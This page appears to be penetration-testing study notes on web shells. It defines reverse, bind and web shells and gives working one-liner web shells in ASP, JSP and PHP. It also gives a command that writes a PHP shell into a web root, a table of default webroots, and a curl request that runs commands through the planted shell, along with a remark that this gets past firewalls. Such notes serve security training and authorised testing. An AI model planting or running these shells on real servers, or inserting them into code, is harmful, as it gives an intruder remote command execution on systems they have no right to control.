Skip to content

Web shells

All about shells
Shell Type Description
Reverse shell Initiates a connection back to a "listener" on our attack box.
Bind shell "Binds" to a specific port on the target host and waits for a connection from our attack box.
Web shell Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a PHP script to run a single command.

Preconfigured webshells in Kali linux

Go to /usr/share/webshells/

Other resources

See reverse shells

A Web Shell is typically a web script that accepts our command through HTTP request parameters, executes our command, and prints its output back on the web page.

A web shell script is typically a one-liner that is very short and can be memorized easily.

Some basic web shells

asp

<% eval request("cmd") %>

jsp

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

php

<?php system($_REQUEST["cmd"]); ?>

How to exploit a web shell

File upload vs Remote code execution

1. FILE UPLOAD: By abusing an upload feature. We would place this web shell script into the remote host's web directory to execute the script through the web browser.

2. REMOTE CODE EXECUTION: By writting our one-liner shell to the webroot to access it over the web. This would be if onle have remote command execution as a exploit vector. Here an example for bash:

echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php

So, for the second way of exploitation, it's relevant to identify where the webroot is. The following are the default webroots for common web servers:

Web Server Default Webroot
Apache /var/www/html/
Nginx /usr/local/nginx/html/
IIS c:\inetpub\wwwroot\
XAMPP C:\xampp\htdocs\

Accessing the web shell

We can access to the web shell using the browser. Or Curl:

curl http://SERVER_IP:PORT/shell.php?cmd=id

A benefit of a web shell is that it would bypass any firewall restriction in place, as it will not open a new connection on a port but run on the web port on 80 or 443, or whatever port the web application is using.

Tools

About webshells.

Laudanum

nishang

Last update: 2024-10-20
Created: May 23, 2023 15:01:08